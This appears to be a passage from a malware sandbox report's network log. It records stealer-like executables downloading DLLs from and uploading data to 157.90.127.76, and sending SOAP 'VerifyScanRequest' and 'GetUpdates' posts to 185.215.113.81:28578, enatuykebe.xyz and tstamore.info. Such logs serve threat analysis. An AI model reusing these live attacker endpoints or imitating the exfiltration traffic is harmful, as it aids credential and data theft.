                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                        X-Cache-Status: EXPIRED
                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/softokn3.dll
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /softokn3.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:58 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 144848
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                                                                        ETag: "235d0-57aa1f0b0df80"
                                                                                                                                                                                        Expires: Sat, 03 Jul 2021 07:16:58 GMT
                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                        X-Cache-Status: EXPIRED
                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://157.90.127.76/vcruntime140.dll
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:00 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 83784
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                                                                        ETag: "14748-57aa1f0b0df80"
                                                                                                                                                                                        Expires: Sat, 03 Jul 2021 07:17:00 GMT
                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                        X-Cache-Status: EXPIRED
                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://157.90.127.76/
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.90.127.76:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                                                                        Content-Length: 50102
                                                                                                                                                                                        Host: 157.90.127.76
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:18 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.msftconnecttest.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.msftconnecttest.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.msftconnecttest.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        v4ncsi.msedge.net
                                                                                                                                                                                        v4ncsi.msedge.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        ncsi.4-c-0003.c-msedge.net
                                                                                                                                                                                        ncsi.4-c-0003.c-msedge.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        4-c-0003.c-msedge.net
                                                                                                                                                                                        4-c-0003.c-msedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        13.107.4.52
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        api.ipify.org
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        api.ipify.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        api.ipify.org
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        nagano-19599.herokussl.com
                                                                                                                                                                                        nagano-19599.herokussl.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        23.21.224.49
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        23.21.136.132
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        50.19.92.227
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        50.16.226.23
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        54.235.88.121
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        54.225.78.40
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        50.16.220.248
                                                                                                                                                                                        elb097307-934924932.us-east-1.elb.amazonaws.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        54.235.175.90
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://api.ipify.org/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        23.21.224.49:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Host: api.ipify.org
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: Cowboy
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:44 GMT
                                                                                                                                                                                        Content-Length: 15
                                                                                                                                                                                        Via: 1.1 vegur
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.81:28578/
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.81:28578
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 185.215.113.81:28578
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Content-Length: 4722
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 14:16:46 GMT
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.81:28578/
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.81:28578
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Host: 185.215.113.81:28578
                                                                                                                                                                                        Content-Length: 1871649
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Content-Length: 150
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 14:17:13 GMT
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.81:28578/
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.81:28578
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                        Host: 185.215.113.81:28578
                                                                                                                                                                                        Content-Length: 1871635
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Content-Length: 261
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 14:17:26 GMT
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        enatuykebe.xyz
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        enatuykebe.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        enatuykebe.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        5.44.45.141
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://enatuykebe.xyz/
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        5.44.45.141:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: enatuykebe.xyz
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:47 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Keep-Alive: timeout=3
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://enatuykebe.xyz/
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        5.44.45.141:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Host: enatuykebe.xyz
                                                                                                                                                                                        Content-Length: 2147433
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        tstamore.info
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        tstamore.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        tstamore.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        45.139.184.124
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://tstamore.info/
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        45.139.184.124:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: tstamore.info
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.2.1
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:46 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Content-Length: 5544
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://tstamore.info/
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        45.139.184.124:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Host: tstamore.info
                                                                                                                                                                                        Content-Length: 294028
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.2.1
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:58 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Content-Length: 150
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://tstamore.info/
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        45.139.184.124:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                        Host: tstamore.info
                                                                                                                                                                                        Content-Length: 294014
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.2.1
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:02 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Content-Length: 261
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:48 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 296
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 57
                                                                                                                                                                                        X-Rl: 43
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.26.13.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /geoip HTTP/1.1
                                                                                                                                                                                        Host: api.ip.sb
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acdc36000039bfcb9c9000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=GSRvvzl8ODYZ1N1cY3yyjjpRRZQhElpkFRcY36VxAuNRY6vM3tR%2FpyUfxyM6D6OMP18bgBmA2YsCE1bhaWgMNsWsFc7ICUC4xir3XCwBHdi164MmdvE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668617405e9c39bf-SEA
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://101.36.107.74/seemorebty/il.php?e=md8_8eus
                                                                                                                                                                                        md8_8eus.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        101.36.107.74:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /seemorebty/il.php?e=md8_8eus HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                        Referer: https://www.facebook.com
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                                                                                                                                                                                        Host: 101.36.107.74
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Server: Apache/2.4.37 (centos)
                                                                                                                                                                                        X-Powered-By: PHP/7.2.24
                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.26.13.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /geoip HTTP/1.1
                                                                                                                                                                                        Host: api.ip.sb
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acdcd2000030ef33a17000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ljacdk%2FEK3Ap5cfyN4blqUg%2F2aiS3BZrb52AYDW0D37GD89%2Bs%2FVi20ZH6PSUg5RgoAQs5H8%2Fh9PjZ4USr%2FWS42Nf8lFA3IAp4OVfLldWYJFxdbGtzmw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668617415a9e30ef-SEA
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acda9d0000fdadd03e3000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TBtuKHNpqen6r2PzfRPhjgtCSQnHNqZUWg3D5mYq3%2Fz7GgimJnjm3Z6fAaWC9WHpAdZTwz2509V3nLfiw0yjpwL5uoUFV9UyuP6JDCrqMOa4aLQHsXp8CqBq8JSZxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686173db9ecfdad-PDX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.26.13.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /geoip HTTP/1.1
                                                                                                                                                                                        Host: api.ip.sb
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07acdd35000008b6e63a9000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NVJ%2F3%2FUpEcEloeWe9QxxTA48%2BaWv%2FKIEYOv7CrYMBvnIkmIBDAuOGHcAvov1qiVJ4RdfxecX88x7iUB2X1uKKD5O1VCe4PhSYSw9bigBIotTQp0%2F5hw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
